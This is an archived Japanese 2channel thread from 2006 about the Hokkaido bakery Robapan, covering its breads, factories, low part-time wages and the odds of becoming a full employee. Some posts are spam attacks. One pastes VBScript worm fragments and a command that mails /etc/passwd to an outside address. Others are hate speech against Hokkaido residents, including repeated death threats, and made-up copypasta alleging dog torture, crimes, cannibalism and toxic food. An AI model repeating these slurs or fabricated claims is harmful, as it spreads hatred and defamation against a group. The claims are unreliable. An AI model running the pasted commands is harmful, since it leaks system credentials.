5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【北海道限定】ロバパン【ロバのパンに非ず】

1 :名無しさん@お腹いっぱい。:2006/02/08(水) 23:29:09 ID:igttNNFI
マイナーかもしれないけど、結構おいしい
でも、北海道以外ではフジパンだったりする・・・

2 :名無しさん@お腹いっぱい。:2006/02/09(木) 01:32:06 ID:A2kdHZrn
2ゲトー
ロバパンって北海道だけだったの?
知らんかったよ。

3 :名無しさん@お腹いっぱい。:2006/02/09(木) 16:37:23 ID:cdph5mlk
ダウンタウンのまっちゃんがロバパンってネタに使ってたよ。
関西にもあるんじゃない?

4 :名無しさん@お腹いっぱい。:2006/02/09(木) 19:51:37 ID:gdXceNFC
関西の移動販売のパン屋の方が元祖
北海道の方はパクリ

5 :名無しさん@お腹いっぱい。:2006/02/24(金) 23:33:10 ID:ddhXdEle
実際ロバを引いて販売をしていた。
ロバの名前はウヰック君と言う名前だった。

6 :名無しさん@お腹いっぱい。:2006/03/03(金) 08:30:23 ID:4xnWwc3y
今はフジパンの手先。
安売り攻勢と大量廃棄覚悟の戦略で市場荒らし。
創業者は下ろされたらすい

7 :名無しさん@お腹いっぱい。:2006/03/25(土) 16:32:12 ID:kCYiPRZl
工場の所を通るとデーモン小暮閣下が恐れおののいていた
おばちゃんコーラスのパンの唄が聞こえてきたな

8 :名無しさん@お腹いっぱい。:2006/04/05(水) 18:41:30 ID:GgNX7etD
FBSは今どうなってる?
FBSの札幌・恵庭・旭川・白老・十勝の今の工場長って誰さ?

9 :名無しさん@お腹いっぱい。:2006/04/08(土) 11:45:59 ID:TfAqLGzI
だからFBSの工場長って誰よ?

10 :名無しさん@お腹いっぱい。:2006/04/08(土) 16:45:03 ID:TfAqLGzI
ねぇねぇ〜だからFBSの工場長って誰よ誰よ誰よ????????

11 :名無しさん@お腹いっぱい。:2006/04/10(月) 00:54:57 ID:0eZiYyTz
いい加減にFBSの工場長教えれや

12 :名無しさん@お腹いっぱい。:2006/04/10(月) 03:35:35 ID:YQ9F2bJ0
辞めた奴が何故そんな事を知りたいのか?
会社に電話して聞け!

13 :名無しさん@お腹いっぱい。:2006/04/12(水) 02:17:15 ID:9tpc0jZP
ホントこの工場は人を働かせ過ぎだな
今日も12時間以上も拘束されたよ

しかも夜勤で(>_<)

14 :名無しさん@お腹いっぱい。:2006/04/12(水) 03:48:29 ID:XdEhLDO1
夜勤で12時間って別に普通じゃね?

15 :名無しさん@お腹いっぱい。:2006/04/12(水) 09:02:49 ID:9tpc0jZP
>>14
確かにね(笑)睡眠不足で仕事の質を計れる訳では無いけど

と、AM5:00に寝て今起きた私が答えてみる

16 :名無しさん@お腹いっぱい。:2006/04/12(水) 14:12:49 ID:IpGsuOTg
南郷通りに工場あったよね

17 :名無しさん@お腹いっぱい。:2006/04/14(金) 17:41:51 ID:bI18qHDL
セブンイレブンの焼きたて直送便ってロバの子会社がやってるんだってセブンでバイトしてる知人から聞いた。

18 :名無しさん@お腹いっぱい。:2006/04/18(火) 20:30:44 ID:EC9uYedE
>>13
残業手当有るだけマシ

19 : ◆e8/nMPiQ32 :2006/04/19(水) 17:56:29 ID:jfSDKFwL
バナナイポーン ウマー(゚Д゚)

20 :名無しさん@お腹いっぱい。:2006/04/26(水) 20:25:58 ID:BZhOcp2z
札幌工場の工場長ってまだミ○ミさんがやってるの?

21 :名無しさん@お腹いっぱい。:2006/04/27(木) 01:17:59 ID:/G1LbNUf
↑しつけー奴だな
ロバに何か怨みでもあんのか?
知りたきゃ電話掛けて聞きやがれ

22 :名無しさん@お腹いっぱい。:2006/04/28(金) 01:16:56 ID:A7JmILlq
職安行ったら真っ先に紹介されたぞ、いっつも募集してるみたいだね
相当離職率が高いんだろうなぁここの会社は

23 :名無しさん@お腹いっぱい。:2006/05/17(水) 23:10:33 ID:crWTFnNO
>>16
12号線沿いじゃなかったか?

24 :名無しさん@お腹いっぱい。:2006/05/24(水) 21:40:04 ID:vU+nnuB9
>>23
正解

25 :名無しさん@お腹いっぱい。:2006/05/29(月) 19:36:32 ID:nUQ6dDp3
保守

26 :名無しさん@お腹いっぱい。:2006/06/02(金) 07:54:51 ID:jWW3Gyyj
v

27 :名無しさん@お腹いっぱい。:2006/06/11(日) 04:26:03 ID:Dw3oGAm7
o

28 :名無しさん@お腹いっぱい。:2006/06/11(日) 13:42:10 ID:L0wSrEvT
いつも山積み本仕込

29 :名無しさん@お腹いっぱい。:2006/06/24(土) 14:31:15 ID:xHqXk4pV
自分の働いてる店では、本仕込より絹艶が売れるお。

30 :名無しさん@お腹いっぱい。:2006/08/05(土) 06:06:22 ID:1jZKNdnT
黒こっぺウマー!!!

31 :名無しさん@お腹いっぱい。:2006/08/17(木) 09:49:09 ID:JgCrXabR
ロバの社員にはなるべきでしょうかね。北海道では日糧とどっち売り上げいいんだろ。

32 :名無しさん@お腹いっぱい。:2006/08/18(金) 02:00:59 ID:reepvkke
ロバパンはフジパンの子会社だったか〜乗っ取られたのかな。

33 :名無しさん@お腹いっぱい。:2006/08/24(木) 20:43:29 ID:rDz5hVNH
イオンに入ってるパン工場ってロバパンだったんだ。

34 :名無しさん@お腹いっぱい。:2006/08/27(日) 22:38:38 ID:wg+GanMc
>>31
やめとけ。

35 :名無しさん@お腹いっぱい。:2006/08/30(水) 06:22:05 ID:mHg8C7TP
>>34
kwsk

36 :名無しさん@お腹いっぱい。:2006/08/31(木) 07:15:01 ID:t5s0k6By
秋のキャンペーン始まったねぇ
新工場 パンクしないかな?

37 :名無しさん@お腹いっぱい。:2006/08/31(木) 07:17:30 ID:t5s0k6By
激しく同意♪

38 :名無しさん@お腹いっぱい。:2006/09/09(土) 09:26:35 ID:QsEYAtxA
>>36
新工場って何処にあるの?

39 :名無しさん@お腹いっぱい。:2006/09/09(土) 14:04:50 ID:IoTB2/Y/
【不幸のレス】
このレスを見た人間は四日以内に死にます。
※あなたに訪れる死を回避する方法が
一つだけ/⌒ヽあります。
それは / ´_ゝ`)5つの板のスレに十分以内に
これを |    / コピペすることです。
      | /| | 
     // | |  
     U .U  

40 :名無しさん@お腹いっぱい。:2006/09/10(日) 22:51:29 ID:SI4Thmgn
>>35
体壊れるぞ
嫌な奴がいるぞ
給料安いぞ
>>38
恵庭

41 :名無しさん@お腹いっぱい。:2006/09/11(月) 22:27:34 ID:+Ynfld5m
古い工場はどうなったの?

42 :名無しさん@お腹いっぱい。:2006/09/12(火) 19:32:05 ID:6+rG2pCC
>>41
現役でフル稼働中

43 :名無しさん@お腹いっぱい。:2006/09/17(日) 20:33:47 ID:q0ggD7/i
クルンテープと申します。
ピーターパン
釧路でパンと言えばこれでしょう、やはり。

44 :名無しさん@お腹いっぱい。:2006/09/20(水) 13:09:14 ID:mfIIVKiJ
フジパンの傘下になってしまったか。残念だな。役員も本州から来てるんだろうな。

45 :名無しさん@お腹いっぱい。:2006/09/26(火) 23:05:17 ID:HYRtwihN
バイトから中途採用で社員になることってあるの?ロバパンは。

46 :名無しさん@お腹いっぱい。:2006/09/26(火) 23:15:39 ID:v/sGoBp8
>>45
日糧のAP乙

47 :名無しさん@お腹いっぱい。:2006/09/29(金) 02:20:05 ID:1gUJtVAk
北海道のロバパンの歴史が知りたい。
社名はいつか変わるのだろうか、フジパンに。

48 :名無しさん@お腹いっぱい。:2006/10/23(月) 00:03:59 ID:YI4KAdrq
本仕込みはおいしいよね。

49 :名無しさん@お腹いっぱい。:2006/10/24(火) 02:01:14 ID:euwVi+uL
ロバパンのバイトはどうなの?

50 :名無しさん@お腹いっぱい。:2006/10/24(火) 02:03:38 ID:Lw56rQqF
>>49
どうって何が?

51 :名無しさん@お腹いっぱい。:2006/10/26(木) 01:03:28 ID:50hwhfZE
中途で社員になれるのかな。バイトしてるものだけど。

52 :名無しさん@お腹いっぱい。:2006/10/26(木) 01:18:14 ID:154BVt5n
アルバイトからの社員登用制度はあるけど
数年に1人居るか居ないかとかそんな割合。
トヨタとかの大会社でも希望者(これだけでも現場上司の推薦が必要)
数百人に対して採用されるのは数人だってよ。

まぁバイトから社員になるのはまず無理。
それでもバイト→社員になれるようなヤツは
ドコの会社を受けても通るような優秀な人だけ。

53 :名無しさん@お腹いっぱい。:2006/10/26(木) 12:33:58 ID:50hwhfZE
了解です、やめときます。

54 :名無しさん@お腹いっぱい。:2006/10/27(金) 01:22:17 ID:kTfGd9EO
時給644円は安いよな。

55 :名無しさん@お腹いっぱい。:2006/10/27(金) 19:52:47 ID:utXKs26z
>>36
新工場、ぜんぜん生産量増えなくて大変だって聞いたけど
大丈夫?

56 :名無しさん@お腹いっぱい。:2006/10/28(土) 23:28:02 ID:IFUaIRUP
敷地を持て余してるらしいなwwwwww

57 :名無しさん@お腹いっぱい。:2006/10/28(土) 23:44:50 ID:TGJ9PVho
古い工場は、新工場の方に引っ越さないの?

58 :名無しさん@お腹いっぱい。:2006/10/28(土) 23:56:59 ID:IFUaIRUP
移転費用いくらかかると思ってんだ

59 :名無しさん@お腹いっぱい。:2006/10/29(日) 00:00:36 ID:TGJ9PVho
たしかに。
24億の新工場の減価償却でさえ厳しいよね。
今期はきっと大赤字だ。


60 :名無しさん@お腹いっぱい。:2006/10/29(日) 01:58:17 ID:2XrAEB4S
本社恵庭市に移さないのか、いつ社名がフジパンに変わるんだか。

61 :名無しさん@お腹いっぱい。:2006/10/30(月) 22:24:09 ID:GIVc1NFZ
ロバはヨーカ堂やセブンイレブンに見放されたら....

62 :名無しさん@お腹いっぱい。:2006/11/01(水) 22:44:15 ID:ulScCqOo
昔からなんかロバパンってぱっとしない会社だよな。業績はいいのか、今は。

63 :名無しさん@お腹いっぱい。:2006/11/03(金) 01:37:29 ID:I427IgCT
なんでこんなに時給安いの?ロバパンは。
バイト来ないよ!こんなんじゃ。
女性もあまりいないよね。日糧よりは売り上げはいいのかな?ちょっと気になった。個人的には日糧よりロバパンのほうが好きだね。
子供の頃からよく食べてたな〜

64 :名無しさん@お腹いっぱい。:2006/11/03(金) 20:56:32 ID:sb5i89LU
きゃらめるメロンパンウマー

65 :名無しさん@お腹いっぱい。:2006/11/04(土) 00:43:04 ID:yoeza8KC
なかなか社員募集してねぇな〜まず無理か。

66 :名無しさん@お腹いっぱい。:2006/11/04(土) 01:24:08 ID:haDDHlD/
ロバパンのちーずこっぺのチーズの少なさに唖然w

67 :名無しさん@お腹いっぱい。:2006/11/05(日) 12:38:09 ID:AmwvQY18
天津甘栗蒸しパンもウマー
でも、なかなか密からなひ。

68 :名無しさん@お腹いっぱい。:2006/11/06(月) 00:00:33 ID:2/K6+85r
北海道だけしかないのか?ロバパンって。

69 :名無しさん@お腹いっぱい。:2006/11/06(月) 23:03:19 ID:7+KbFw+q
ロバパン、基本的にクリームやらのトッピングしょぼいよね。
マロンスティック買ったけど、生地のわりにクリームも栗も少なめ。
特に栗の量。「マロン」スティックといえるものではなかった。

70 :名無しさん@お腹いっぱい。:2006/11/07(火) 02:21:02 ID:mfCQwpdJ
恵庭工場でも社員は募集してないのかね〜

71 :名無しさん@お腹いっぱい。:2006/11/08(水) 11:41:52 ID:/6XDOXwG
白石にある工場ってまだ動いてるのかな。
工場のバイトはけっこうキツイ労働なのか。

72 :名無しさん@お腹いっぱい。:2006/11/08(水) 18:15:55 ID:E42s8Khi
まだ白石が主力だろ

73 :名無しさん@お腹いっぱい。:2006/11/09(木) 15:56:08 ID:auj8XafS
工場はいつも募集してるけど人が定着しないんだろうか。派遣の募集でもロバが多い。644円じゃ人は集まらないよ。安すぎる。

74 :名無しさん@お腹いっぱい。:2006/11/09(木) 20:25:48 ID:qHbh4Nge
安くてすみません。
上げられない事情があるもんで。

75 :名無しさん@お腹いっぱい。:2006/11/09(木) 20:29:19 ID:qHbh4Nge
>>60
別に子会社になったわけじゃないので。

76 :名無しさん@お腹いっぱい。:2006/11/10(金) 11:59:38 ID:G+u9Bycd
ヨーカ堂に売ってる味わい食パンはなかなかおいしいね。

77 :名無しさん@お腹いっぱい。:2006/11/11(土) 10:58:29 ID:TK660QVC
本仕込み美味しかった。
絹艶より全然イイ!!

78 :名無しさん@お腹いっぱい。:2006/11/11(土) 11:48:20 ID:aB5Jz4w8
和みはあまりおいしくないな。本仕込みはおいしいね。日糧よりおいしいパンはたくさんある。

79 :名無しさん@お腹いっぱい。:2006/11/12(日) 19:56:38 ID:dybdXPvU
ほとんどが恵庭工場で作ってるのかな?
白石工場かそれとも?

80 :名無しさん@お腹いっぱい。:2006/11/12(日) 22:55:02 ID:32aOh2Kn
和み、あんまりおいしくないっていうより、まずい。
本仕込み、みなさん赤と緑どっちが好き?
緑が好きなのに赤しかなくて困る。両方並べればいいのに。
なんで?おしえてろばの人。

81 :名無しさん@お腹いっぱい。:2006/11/12(日) 23:23:16 ID:WXNBKv9d
なごみ、今度買ってみようと思ってたけど不味いのか…
うちの近所も本仕込みは赤しか置いてないな。
緑も食べてみたい!

82 :名無しさん@お腹いっぱい。:2006/11/13(月) 12:21:14 ID:lzM/HvgS
本仕込みって赤と緑があるってパッケージだけ違うんじゃないの?味は変わらんしょ。

83 :名無しさん@お腹いっぱい。:2006/11/13(月) 15:50:03 ID:l5/IMYwM
いつもと違うスーパーへ行ったら、本仕込みの緑を発見!!
何だ、ただの山食じゃん…


84 :名無しさん@お腹いっぱい。:2006/11/13(月) 19:55:27 ID:lzM/HvgS
質問あったんだけどパンの工場のバイトって結構キツイハードな作業なの?パンの製造は。

85 :名無しさん@お腹いっぱい。:2006/11/14(火) 18:33:33 ID:5DwrMRKL
やっぱり、菓子パンの中ではメープルメロンパンが一番美味しいな。

86 :名無しさん@お腹いっぱい。:2006/11/14(火) 23:51:51 ID:k5ruEd71
エフビーエスもバイトからは社員にはなれないんかな?

87 :シャドウ ◆yBVqSplqmM :2006/11/15(水) 17:04:49 ID:Z5lfPLJq
自分はロバでバイトしてる者です。
時給は勤続年数や能力により昇給します。それから年一回ですがバイトから社員になれるチャンスもあります。

88 :名無しさん@お腹いっぱい。:2006/11/15(水) 21:29:31 ID:VWUVjWuX
時給もあがるの?ほとんど社員にはなれないような事書いてあったねこのスレに。滅多に社員にはなれないわけね。

89 :名無しさん@お腹いっぱい。:2006/11/16(木) 10:31:41 ID:0MFKp1zo
『社員登用制度あり』なんて文句はバイトを集める撒きエサみたいなモンです。
アルバイトから正社員になれるならみんななりたいですよね。
でも、新卒採用でも年に数人の会社が、30分で覚えられるような単純作業従事者を
正社員として雇用すると思いますか?

精々『準社員』でネーム入りの制服、社用電卓、安全靴の支給。
あとの待遇、賃金は普通のバイトと一緒というのが現実的なトコロです。

90 :名無しさん@お腹いっぱい。:2006/11/16(木) 10:33:18 ID:19fKK3yQ
必死だな、道産子。

あー弱者いびりは楽しいねえ。
由緒正しい日本人でなければできない遊びだよ。
まあ、嗜みのひとつって事で。

お前らは俺らの気分で運命すら左右される
野蛮人と罪人のなれの果てなんだよ。
悔しいか?理不尽か?そうだろうなあ。

でもそれはお前らが悪いんだよ。
少数派で弱者だからな。
誰もお前らを守ってはくれない。
お前ら自身で自分の身すら守れない。

みじめだねえ。


91 :名無しさん@お腹いっぱい。:2006/11/16(木) 10:52:13 ID:19fKK3yQ
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"


92 :名無しさん@お腹いっぱい。:2006/11/16(木) 10:53:05 ID:19fKK3yQ
呪 呪 呪 呪 呪 呪 呪 呪 縛 呪 呪 呪
縛 呪 呪 縛 呪 呪 呪 縛 呪 呪 呪 呪
呪 呪 呪 呪 呪 呪 縛 呪 呪 呪 呪 縛
縛 縛 縛 縛 縛 縛 縛 縛 縛 縛 縛 縛


93 :名無しさん@お腹いっぱい。:2006/11/16(木) 23:12:32 ID:F2FRZEBN
>>90
アホ

94 :名無しさん@お腹いっぱい。:2006/11/16(木) 23:17:22 ID:F2FRZEBN
ID:19fKK3yQ に呪いかけた。


95 :名無しさん@お腹いっぱい。:2006/11/17(金) 23:21:23 ID:gP4/05Rm
いっちゃんってここの社員ってホント?

96 :シャドウ ◆yBVqSplqmM :2006/11/18(土) 14:47:58 ID:KDV5Zwpe
>>89>>90
ロバに何か恨みあるのか?
>>93
おまえイイヤツ

97 :名無しさん@お腹いっぱい。:2006/11/18(土) 22:44:02 ID:A9VA7rtM
ただバイトから社員になりたいだけだ。

98 :名無しさん@お腹いっぱい。:2006/11/19(日) 20:34:51 ID:3nJNNPwP
恋愛サロンからきますた

>>96
巣に帰れ

99 :名無しさん@お腹いっぱい。:2006/11/21(火) 11:44:13 ID:fyKt6Msx
おい!こら!どーみん!

9割以上の道民は劣っているんだ。これは絶対だ!
ほんと、道民同士でダメな日本人を引き合いに出して優位に立つ幻想に浸って傷の舐め合いとか見てて哀れだよ。
道民はちっぽけな存在だ。
寝て起きて飯食って盛ってセックスして寝て。と、動物みてーだな。知性の欠片もない。
同類の男女でたむろって楽しいか?
ちっぽけな愛。ちっぽけなカネ。ちっぽけな身分。ちっぽけな人生…  
オマエラにだって欲はあるだろ?チヤホヤされたいだろ?
ぃい女抱きたいだろ?いろんな物が欲しいだろ?いろんな経験したいだろ?金欲しいだろ?
嘘つくなよ。どーみん。

道民は見てて恥ずかしいよ。まともな会社すら受ける資格も持たない。
履歴書にも本籍地北海道だよ?吐き気がするね。
北海道人で海外留学? ちょっと殺すよ?
まともな語学力もない道民が留学したら、俺らアジア人の顔に泥を塗ることになるんだ。
無能な道民集団で縄張りなんか作って傷の舐め合い。バカ女は白人の肉便器。男はその肉便器のケツを追っ掛ける…
本人の自由だろって?自由の意味を吐き違えられちゃ困るね。
自由というものには責任もつくんだよ。君らゴミに責任能力などないくせに大口叩いてもらっちゃ困るよ。
そうだよ。道民は人並み以下の努力もしないで、人並み以上の権利を要求する。
日本はバリアフリー化が進んで体が不自由な方も住みやすくなったが同時に経済発展で
道民という名の知的障害者も恥ずかしさを感じずにスカして生きていやがる。
でも、こんな時代は終わるよ。二極化で勝ち組と負け組のどっちかになるほかない。
アタマの悪い道民は将来と言っても明日明後日まで先のことしか考えられない。
長期的スパンで考える知能がないからね。だから大学に行かない考えなんかが浮かぶ。
もう自分が道民だったらと考えたら恐ろしいね。夜も眠れないよ。


生きてて恥ずかしくないの?どーみん

100 :名無しさん@お腹いっぱい。:2006/11/21(火) 13:23:12 ID:bBy24b0v
ロバのセブンにあるパンはうまいの多い!

101 :シャドウ ◆yBVqSplqmM :2006/11/21(火) 14:48:19 ID:+A3Y6PzS
>>97
どこのバイトよ?
>>98
わかりますた

102 :シャドウ ◆yBVqSplqmM :2006/11/21(火) 17:16:42 ID:+A3Y6PzS
>>99
うっせうっせ
道民をバカにするな
>>100
ありがとうm(__)m

103 :名無しさん@お腹いっぱい。:2006/11/21(火) 17:24:21 ID:bBy24b0v
友達がロバパンに勤めてまして。よくロバパン食べますよ〜セブンにあるサンドウィッチもやっぱロバパンなのかい。

104 :名無しさん@お腹いっぱい。:2006/11/21(火) 20:09:26 ID:/dN1Q2rO
>>99
頭悪いの丸出し

105 :名無しさん@お腹いっぱい。:2006/11/21(火) 21:41:21 ID:/dN1Q2rO
>>99
>生きてて恥ずかしくないの?どーみん
おまえみたいなのがはずかしいんだよ。
おまえより頭がいい道民はたくさんいるさ
こういうスレのせるやつは、大体自分のことを書いているのさ
悔しかったらなんか言ってみ



106 :名無しさん@お腹いっぱい。:2006/11/22(水) 12:59:10 ID:9+eCpBcu
ロバって、製品いいのに人が低能揃いだな。
仕入れる側だが、製品扱いが雑。詰め込みまくってて最初ゴミかと思ったし。

しかもクレームの電話口で支店長にオマエ呼ばわりする役職者。
ロバの班長ってどんだけエラいんだお前らw

107 :名無しさん@お腹いっぱい。:2006/11/22(水) 16:45:37 ID:qB7/7qH0
俺は>>99ではないが・・・

>>102>>104-105
有名なコピペに反応するなよwww新参乙

108 :名無しさん@お腹いっぱい。:2006/11/24(金) 03:08:23 ID:LlDkYY3V
年に一回バイトから社員になれますなんてあったけど、難しい試験などあるのかい。

109 :名無しさん@お腹いっぱい。:2006/11/24(金) 08:45:40 ID:GPwOXtvI
ない。
偉い人の気分次第。
何十年やってもバイトのままなんて人もいる。

110 :シャドウ ◆yBVqSplqmM :2006/11/25(土) 02:01:41 ID:wDmVI6zr
>>108
試験は無いです。ただ役職者の推薦と各部署長の印を押した書類を会社側に提出しても辞令が下りなければ社員にはなれません。
>>109
認められる程の仕事をしてないからじゃないですか?

111 :名無しさん@お腹いっぱい。:2006/11/26(日) 21:07:01 ID:wPMTWl4a
ロバパンのソフトサンド・・・ピーナツバターもチョコも
少ねえ・・・・しかも何がソフトだ・・・・
もっそもっそじゃねえか!いやな昼休みだったよチクショウ!

112 :シャドウ ◆yBVqSplqmM :2006/11/27(月) 00:48:57 ID:5pGPptvR
>>111
ごめんなさい。だがその件に関しては禿しく同意www

113 :名無しさん@お腹いっぱい。:2006/11/29(水) 21:38:54 ID:Ig7dmwgK
日糧製パンスレもあります。

114 :名無しさん@お腹いっぱい。:2006/11/30(木) 02:36:12 ID:XM4ss19y
だから何だよ

115 :名無しさん@お腹いっぱい。:2006/12/02(土) 01:52:58 ID:ESroUQ0y
時給あげろよ早く

116 :シャドウ ◆yBVqSplqmM :2006/12/02(土) 02:43:12 ID:8HCZX08e
>>115
俺は時給722円です。

117 :名無しさん@お腹いっぱい。:2006/12/03(日) 00:17:21 ID:5Ihfa+pg
644だよあたし....

118 :名無しさん@お腹いっぱい。:2006/12/03(日) 01:16:07 ID:tFSBD+UU
シャドウさんは社員かと思ってたら、バイトだったの?

119 :シャドウ ◆yBVqSplqmM :2006/12/04(月) 00:00:44 ID:4s1KNY+g
>>117
最初は皆最低賃金レベルですからね。所属はどこですか?自分は本社物流です。
>>118
まだバイトですよ。過去何回か社員昇格の為の書類を出してもらいましたが会社からの辞令が下りませんでした。

120 :名無しさん@お腹いっぱい。:2006/12/04(月) 23:15:46 ID:+bkd8PhY
大企業でもないのにロバもずいぶんもったいつける会社だな。社員に雇えるほど力はないんじゃないのか。あまりいい話は聞かないぞ確かに。

121 :シャドウ ◆yBVqSplqmM :2006/12/05(火) 00:21:03 ID:9Bb87nQa
>>120
最近は定年間近の人がたくさんいるので高校の新卒を募集して結構内定決めたみたいですよ。

122 :名無しさん@お腹いっぱい。:2006/12/05(火) 23:25:10 ID:YqeyRrKE
新卒もいいがバイトで社員になりたいやついるなら、ならしてやればいいのに。その人にもよるがな。

123 :名無しさん@お腹いっぱい。:2006/12/06(水) 21:55:12 ID:+it49BAQ
北海道人死ね殺す北海道人死ね殺す北海道人死ね殺す北海道人死ね殺す
死ね殺す北海道人死ね殺す北海道人死ね殺す北海道人死ね殺す北海道人
北海道人死ね殺す北海道人死ね殺す北海道人死ね殺す北海道人死ね殺す
死ね殺す北海道人死ね殺す北海道人死ね殺す北海道人死ね殺す北海道人
北海道人死ね殺す北海道人死ね殺す北海道人死ね殺す北海道人死ね殺す
死ね殺す北海道人死ね殺す北海道人死ね殺す北海道人死ね殺す北海道人
北海道人死ね殺す北海道人死ね殺す北海道人死ね殺す北海道人死ね殺す
死ね殺す北海道人死ね殺す北海道人死ね殺す北海道人死ね殺す北海道人
北海道人死ね殺す北海道人死ね殺す北海道人死ね殺す北海道人死ね殺す
死ね殺す北海道人死ね殺す北海道人死ね殺す北海道人死ね殺す北海道人

124 :名無しさん@お腹いっぱい。:2006/12/06(水) 22:43:17 ID:AggUFABm
<<123
また低脳なバカが現れた

たぶんこいつ相当なコンプレックス持ってる鬼畜なドアホだ

125 :シャドウ ◆yBVqSplqmM :2006/12/13(水) 03:17:06 ID:mPcf96/N
もうそろそろクリスマスケーキで忙しくなるな。
よし!!今年も頑張るぞ
是非ともロバのケーキを買ってください。パン屋だけあってスポンジ美味いですから

126 :名無しさん@お腹いっぱい。:2006/12/13(水) 03:18:09 ID:L8EiOG0U
障害者だけでなく、北海道は全体的に弱者への風当たりが強い。
動物愛護精神なんてカケラほども存在しないので、野良犬、野良猫は
見つけ次第蹴り殺すようなオヤジが沢山居る。
東京だとニュースになる動物虐待も、北海道じゃ普通。
__________________________________________________________________________________________

東京の放送局では日本シリーズにちなんで、北海道での犬肉喰いの
問題にスポットを当てて北海道からの映像を放送していた。
その北海道での犬肉喰いの問題点は、苦しませて苦しませて殺した犬の肉は
とても美味しいのだと一般の北海道民が信じているため、
出来るだけ苦しませてから殺しているということ。
映像では北海道で食べるために殺す犬を虐待する映像が放送されていた。
北海道にとって都合の悪いそういう映像は、報道の自由がない札幌のメディアは絶対に放送しない。
__________________________________________________________________________________________

北海道では犬を食する事は、日常的な事であり
虐待とは、思っていないから注意や指摘をすれば逆ギレしてくる。
__________________________________________________________________________________________

犬鍋の際に出来るだけ犬を苦しめて殺した方がうまくなると考えられているそうです。

127 ::2006/12/16(土) 00:14:38 ID:VGWJrRH5
私北海道在住ですが犬肉なんてどこでたべれるんだ?そんなものみたことないぞ。

128 :名無しさん@お腹いっぱい。:2006/12/16(土) 01:44:40 ID:6X306TGQ
コピペにマジレスすんな新参

129 :名無しさん@お腹いっぱい。:2006/12/16(土) 03:16:31 ID:biPay3I9
【北海道】『タクシー運転手を暴行』〜彼女との愛情表現を注意されて
札幌中央警察は13日、タクシーの後座席でガールフレンドと『愛情表現』を
していて、注意されるとタクシー運転手を殴打した容疑(暴力行為などの処罰に関する
法律違反)で金子某氏(26歳)を書類送検した。
警察によれば金子氏はこの日の午前0時30分頃、地下鉄・すすきの駅から
タクシーに乗り、後部座席でガールフレンドを抱えこんでキスをしていて、タクシー
運転手の李某さん(49歳)が「慎んでくれ」と注意すると、李さんを車の外へ引きずり
出して顔を殴った容疑を受けている。
金子氏は警察で、「友達と飲み会を終わらせて、ガールフレンドを千歳市の
家に送る途中で耳障りな話を聞き、瞬間的に理性を失った」と語った。

【北海道】エロ親父とエロ叔父と可哀想な娘
「結婚前に性教育が必要だ」〜実の娘(15)に2年間性暴行した父親と叔父逮捕。
警察によれば朴某さんは去る2004年7月から最近まで江別市S町の自分の
家で「結婚の前に性関係をして見なければならない」と実の娘A(15)嬢を50余回に
わたり性暴行した疑いだ。
警察の調査で朴某さんは「去る2001年、二番目の妻と離婚した後、さびしく過ごしてい
たが、見ると娘が女に見えてひどいことをした」と「性関係をもった後、常に後悔したが
衝動を押えつけることができなかった」と述べた。

【北海道】「買い食い」ならぬ「食い買い」、スーパーで飲んだり食べたりする北海道民
札幌市内のスーパーで買い物をしていると、陳列棚から商品を取るなり、
飲んだり食べたりする姿を見かける。四個一パックの乳酸飲料の一つを
その場で子供に飲ませ、残りを買い物かごに入れたり、あめの袋を破って
口に放り込んだり。
東京のスーパーだったら、間違いなく店員から注意されるだろう。「買ってからに
してください」と。最近、北海道からの観光客が急増している長崎県対馬市のスーパーでは、
レジでの精算前に商品を食べてしまう北海道人のお客さんがいて、周りをびっくりさせた、
という話を聞いた。
「買い食い」、ならぬ「食い買い」。
北海道では「すぐに食べたいから買いに来た」、「あとでお金を払えばいい」という論理が
通ってしまうらしい。

130 :しゃー:2006/12/19(火) 12:00:33 ID:sD6vhIpw
最近終わらないなぁ誰でもいいからきてくれー

131 :名無しさん@お腹いっぱい。:2006/12/19(火) 12:01:19 ID:0BmZvaM8
● 北海道民は人肉を食べることを楽しんできた

北海道民は違う。あきらかに人肉を食べることを楽しんできた。人肉食、人相食、夫食婦、婦食夫、
こういう記録が北海道の歴史の随所に見いだされる。あの松前藩は子供の丸蒸しを料理として賞味した。
江戸時代には人肉料理のメニューさえある。そのころ食肉用の人間は「両脚羊」と呼ばれていた。
1960年、北海道で炭鉱事故がおこり、ただ一人生き残った炭坑夫は生き残るために人肉を食べた。
そして「息の切れた人間の肉はおいしくない。やはり生きている人間の肉はうまかった」と発言して大きなニュースになった。
人を食べたからではない。どれが美味しかったという点でだ。それについて北海道大学の教授が人肉と牛肉と豚肉のいずれが、
より栄養価が高くうまいかを新聞紙上でコメントした。このことは如実に北海道の社会常識として現在でも人肉は食用たりうることを物語っている。
つまり北海道にとって人間を食べるという行為は飢餓をしのぐのためではなく、食文化の一つなのだ。

132 :名無しさん@お腹いっぱい。:2006/12/20(水) 00:46:05 ID:EdgoccLv
>>131
http://academy4.2ch.net/test/read.cgi/gengo/997585596/843

どっかから一生懸命コピーしているアホがいるので
かまわないことが重要。
あっちこっちにカキコしているので単なるノータリンと受け止めよ。

133 :名無しさん@お腹いっぱい。:2006/12/21(木) 01:19:38 ID:e+vuXT2h
だれ?いつもこんないやがらせのカキコミしてる人は?
あまりにもひどいんじゃないか。

134 :名無しさん@お腹いっぱい。:2006/12/24(日) 13:28:05 ID:YaWaAti+
>>133北海道関連スレに貼られまくっているよ。放置放置。

135 :名無しさん@お腹いっぱい。:2006/12/25(月) 02:29:16 ID:PmCt4I1V
●北海道は「不良食品」人体実験場?寄生虫卵入りジンギスカンなどほとんど回収されず
去年と今年、食品衛生法に違反して回収命令が下された有害食品のうち、約70%が回収
されないで道内に流通したことが明らかになった。
発癌疑惑物質であるマラカイト・グリーンが検出された厚岸牡蠣の場合、
全体7万2287sのうち9.2%である6673sだけしか回収されず、漂白剤や防腐
剤の原料物質である二酸化イオウが超過して検出され回収指示を受けた花咲ガニは、
